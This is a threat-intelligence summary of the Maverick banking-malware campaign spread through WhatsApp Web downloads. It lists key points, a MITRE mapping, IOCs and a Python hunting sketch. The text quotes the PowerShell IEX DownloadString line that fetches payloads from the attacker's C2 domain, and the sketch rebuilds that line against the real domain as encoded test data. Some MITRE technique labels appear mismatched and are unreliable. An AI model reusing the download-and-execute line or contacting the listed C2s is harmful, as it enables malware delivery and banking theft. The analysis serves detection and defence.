CyberProof investigated a campaign spreading Maverick (aka Maverik) banking malware via WhatsApp downloads, finding multi-stage obfuscated PowerShell and .NET loaders that contact zapgrande[.]com and other C2s to deliver banking-focused capabilities targeting Brazilian users and banks. Analysis shows code, encryption (AES+GZIP), persistence, and victimology similarities with Coyote/Coyote-Maverick campaigns and public reports by Kaspersky, Sophos, and TrendMicro. #Maverick #Coyote #zapgrande
Key points
- Initial infection vector observed: malicious ZIP delivered via web.whatsapp.com containing a .lnk shortcut that spawns obfuscated cmd/powershell to fetch payloads.
- Observed first-stage sample: NEW-20251001_152441-PED_561BCF01.zip (SHA1: aa29bc5c…, SHA256: 949be423…) with encoded PowerShell that downloads from zapgrande[.]com.
- Attack uses multi-stage, fileless patterns: obfuscated CMD → concatenated for-loop tokens → encoded PowerShell (-enc) → IEX DownloadString from C2 (zapgrande[.]com) and reflective .NET loaders in memory.
- Maverick agent includes anti-analysis checks, persistence via HealthApp-GUID+.bat in startup, browser and banking-URL checks, AES+GZIP decryption of targeted bank URLs, and command-and-control capabilities.
- Victimology and code overlap: primarily Brazilian users and banks; strong similarities with previously reported Coyote/Coyote-era samples and public research by Kaspersky, Sophos, and TrendMicro.
- Key IOCs and C2s include zapgrande[.]com (109.176.30.141), sorvetenopote[.]com, and specific sample hashes; some C2 endpoints returned 404 during investigation, limiting full chain observation.
- Provided a hunting KQL query to detect suspicious files downloaded via web.whatsapp.com and subsequent cmd→powershell spawn within a 1-hour window for SOC hunting.
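As an added illustration (not the report's own KQL, which is not reproduced here), the following Python sketch implements the same hunt over constructed telemetry: a file whose download origin is web.whatsapp.com, followed within one hour on the same device by cmd.exe spawning powershell.exe, with any -enc payload decoded so the download URL surfaces for triage. The field names, the sample events and the zapgrande[.]com path token are assumptions made for the example.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed telemetry, shaped loosely like Defender's DeviceFileEvents and
# DeviceProcessEvents rows (field names are assumptions, not the report's).
ENCODED = base64.b64encode(  # constructed stand-in for the -enc blob
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://zapgrande.com/api/itbi/EXAMPLE-TOKEN')".encode("utf-16-le")).decode()
FILE_EVENTS = [
    {"ts": "2025-10-01T15:24:41", "device": "WS01", "origin": "https://web.whatsapp.com/",
     "file": "NEW-20251001_152441-PED_561BCF01.zip"},
    {"ts": "2025-10-01T09:00:00", "device": "WS02", "origin": "https://mail.example.invalid/",
     "file": "invoice.pdf"},
]
PROCESS_EVENTS = [
    {"ts": "2025-10-01T15:30:12", "device": "WS01", "parent": "cmd.exe",
     "proc": "powershell.exe", "cmdline": f"powershell.exe -w hid -enc {ENCODED}"},
    {"ts": "2025-10-01T18:00:00", "device": "WS01", "parent": "cmd.exe",
     "proc": "powershell.exe", "cmdline": "powershell.exe -c Get-Date"},  # outside window
]

def decode_enc(cmdline):
    """Decode a -e/-enc/-EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le", "replace") if m else None

def extract_urls(text):
    """Pull http(s) URLs out of decoded script text (quotes terminate a URL)."""
    return re.findall(r"https?://[^\s'\")]+", text)

def hunt(file_events, process_events, window=timedelta(hours=1)):
    """WhatsApp-web download followed on the same device, within `window`,
    by cmd.exe spawning powershell.exe; -enc payloads are decoded for triage."""
    hits = []
    for f in file_events:
        if "web.whatsapp.com" not in f["origin"].lower():
            continue
        t0 = datetime.fromisoformat(f["ts"])
        for p in process_events:
            if (p["device"] != f["device"] or p["parent"].lower() != "cmd.exe"
                    or p["proc"].lower() != "powershell.exe"):
                continue
            delta = datetime.fromisoformat(p["ts"]) - t0
            if timedelta(0) <= delta <= window:
                decoded = decode_enc(p["cmdline"])
                hits.append({"device": f["device"], "file": f["file"], "decoded": decoded,
                             "urls": extract_urls(decoded) if decoded else []})
    return hits
```

Running `hunt(FILE_EVENTS, PROCESS_EVENTS)` returns the single WS01 correlation with the decoded IEX download URL; the later powershell spawn falls outside the window and is ignored.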
MITRE Techniques
- [T1204] User Execution – Malicious ZIP delivered via WhatsApp containing a .lnk that relies on user action to execute the shortcut and trigger the attack (“malicious Zip file downloaded from Whatsapp web” and “when the user is tricked to execute the lnk file (shortcut file), it deobfuscates code to construct and launch cmd or powershell”).
- [T1059] Command and Scripting Interpreter – Use of cmd.exe and powershell.exe to build and execute encoded commands and download remote scripts (“cmd.exe … for %… do … powershell.exe -w hid -enc … IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//zapgrande[.]com/…’)”).
- [T1105] Ingress Tool Transfer – Downloader pattern where PowerShell downloads and executes remote payloads from zapgrande[.]com (“PowerShell downloads the remote script from zapgrande[.]com and executes it in memory (via IEX) which is a typical fileless downloader / loader pattern”).
- [T1218] Signed Binary Proxy Execution (Scripting) – Use of legitimate interpreters (cmd.exe, powershell.exe) to execute malicious scripts and encoded commands (“Initial obfuscated CMD → spawn PowerShell → download-and-execute remote payload”).
- [T1053] Scheduled Task/Startup Items – Persistence via a batch file dropped in the startup folder (HealthApp-<GUID>.bat) that contacts the C2 on startup (“persistence is achieved through dropping batch file in startup folder … HealthApp- + GUID + .bat”).
- [T1497] Virtualization/Sandbox Evasion – Anti-analysis checks in .NET loader to detect reverse-engineering tools and self-terminate if detected (“this .NET loader is programmed to check for anti-analysis techniques to check for reverse engineering tools and if any found, it would self-terminate”).
- [T1106] Native API – Reflective loading of .NET assemblies in memory to avoid writing to disk (“code shown … looks to be a .NET loader that gets constructed and executed in memory through reflective loading”).
- [T1555] Credentials from Web Browsers / [T1476] Browser Bookmarking / [T1056.001] Input Capture – Browser and banking-URL checks to monitor targeted banking applications and interact with browser processes (checks for browser PIDs and targeted Brazilian banking URLs to monitor/intercept sessions) (“Next it checks for browser checking PID … string match check of bank URLs performed by Maverick banking module”).
- [T1041] Exfiltration Over C2 Channel – Agent supports commands and C2 communications for data/commands with attacker server (“Maverick agent … can perform command and control communication” and shows commands accepted by Maverick Agent).
Indicators of Compromise
- [Domain] C2 and hosting – zapgrande[.]com (associated with 109.176.30.141) and sorvetenopote[.]com (associated with 77.111.101.169)
- [IP] C2 IP – 109.176.30.141 used by zapgrande[.]com (observed outbound connection from PowerShell to 109.176.30.141)
- [URL] Malicious download URL – hxxps[:]//zapgrande[.]com/api/itbi/BrDLwQ4tU70zZUeEHSSimym64kqXVG39 (PowerShell IEX DownloadString target)
- [File Hashes] Sample artifacts – SHA1: aa29bc5cf8eaf5435a981025a73665b16abb294e, SHA256: 949be42310b64320421d5fd6c41f83809e8333825fb936f25530a125664221de
- [File Hashes] Additional sample – SHA1: 835478d00945db56658a5f694f4ac9f5d49930db, SHA256: 77ea1ef68373c0dd70105dea8fc4ab41f71bbe16c72f3396ad51a64c281295ff
- [FileName] Malicious archive/file name – NEW-20251001_152441-PED_561BCF01.zip (contains .lnk and encoded PowerShell)